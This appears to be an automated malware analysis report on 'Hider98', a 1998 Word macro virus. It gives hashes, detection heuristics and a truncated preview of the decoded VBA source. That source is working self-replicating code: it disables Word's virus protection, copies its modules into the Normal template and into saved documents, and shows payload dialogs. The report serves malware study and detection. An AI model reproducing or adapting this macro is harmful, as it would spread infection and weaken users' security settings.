Hider98 — Office (OLE) malware analysis

Static analysis result for SHA-256 166b87d5f1c338eb…

MALICIOUS

Office (OLE)

96.0 KB Created: 1998-06-12 13:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: bde238fa1d80aaa2232e46da1aff2f63 SHA-1: 8856e37100a698c64a70d07260681f691272cd8c SHA-256: 166b87d5f1c338eb7459b222c9bf9ccc61a8f1a91cae1b2ff9d7c025992ca703
160 Risk Score

Malware Insights

Hider98 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro virus markers and a VBA macro named 'Hider98'. The AutoOpen subroutine attempts to copy itself and other components ('FileOp', 'FileSA') to the Normal template, indicating a persistence mechanism. The macro also displays a message box to the user, suggesting a lure or distraction.

Heuristics 4

  • ClamAV: Doc.Trojan.Zmk-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zmk-6
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30652 bytes
SHA-256: 9077745c9688fe26a576bfcd18ec205437513646ce263f8da4db3e33ae2cb62c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hider98"
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAO
iMacroCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "Hider98" Then
        Hider98Installed = -1
    End If
Next i
If Not Hider98Installed Then
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Hider98", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="FileOp", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="FileSA", Object:=wdOrganizerObjectProjectItems
    MsgBox "Une surprise vous attend...", vbCritical, "Virus Hider98"
Else
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Hider98", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileOp", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileSA", Object:=wdOrganizerObjectProjectItems
End If
ErrorAO:
End Sub
Sub FileOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFO
Dim MyDate
Randomize
MyDate = Date
D$ = Mid(MyDate, 1, 2)
NHD$ = Int(Rnd * 31) + 1
If NHD$ = "1" Then NHD$ = "01"
If NHD$ = "2" Then NHD$ = "02"
If NHD$ = "3" Then NHD$ = "03"
If NHD$ = "4" Then NHD$ = "04"
If NHD$ = "5" Then NHD$ = "05"
If NHD$ = "6" Then NHD$ = "06"
If NHD$ = "7" Then NHD$ = "07"
If NHD$ = "8" Then NHD$ = "08"
If NHD$ = "9" Then NHD$ = "09"
If D$ = NHD$ Then
    FileOp.Show
    MsgBox "ZeMacroKiller98 est heureux de vous dédier ce nouveau virus.", vbInformation, "Virus Hider98"
Else
    Dialogs(wdDialogFileOpen).Show
End If
ErrorFO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
Dim MyDate, Valeur$
Randomize
MyDate = Date
D$ = Mid(MyDate, 1, 2)
NHD$ = Int(Rnd * 31) + 1
If NHD$ = "1" Then NHD$ = "01"
If NHD$ = "2" Then NHD$ = "02"
If NHD$ = "3" Then NHD$ = "03"
If NHD$ = "4" Then NHD$ = "04"
If NHD$ = "5" Then NHD$ = "05"
If NHD$ = "6" Then NHD$ = "06"
If NHD$ = "7" Then NHD$ = "07"
If NHD$ = "8" Then NHD$ = "08"
If NHD$ = "9" Then NHD$ = "09"
If D$ = NHD$ Then
Debut:
    FileSA.Show
    Valeur$ = WordBasic.[GetPrivateProfileString$]("FileSA", "Choix", "WIN.INI")
    If Valeur$ <> "1" Then
        GoTo Debut
    End If
Else
    Dialogs(wdDialogFileSaveAs).Show
    If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Hider98", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileOp", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="FileSA", Object:=wdOrganizerObjectProjectItems
    ActiveDocument.Save
End If
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCanc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.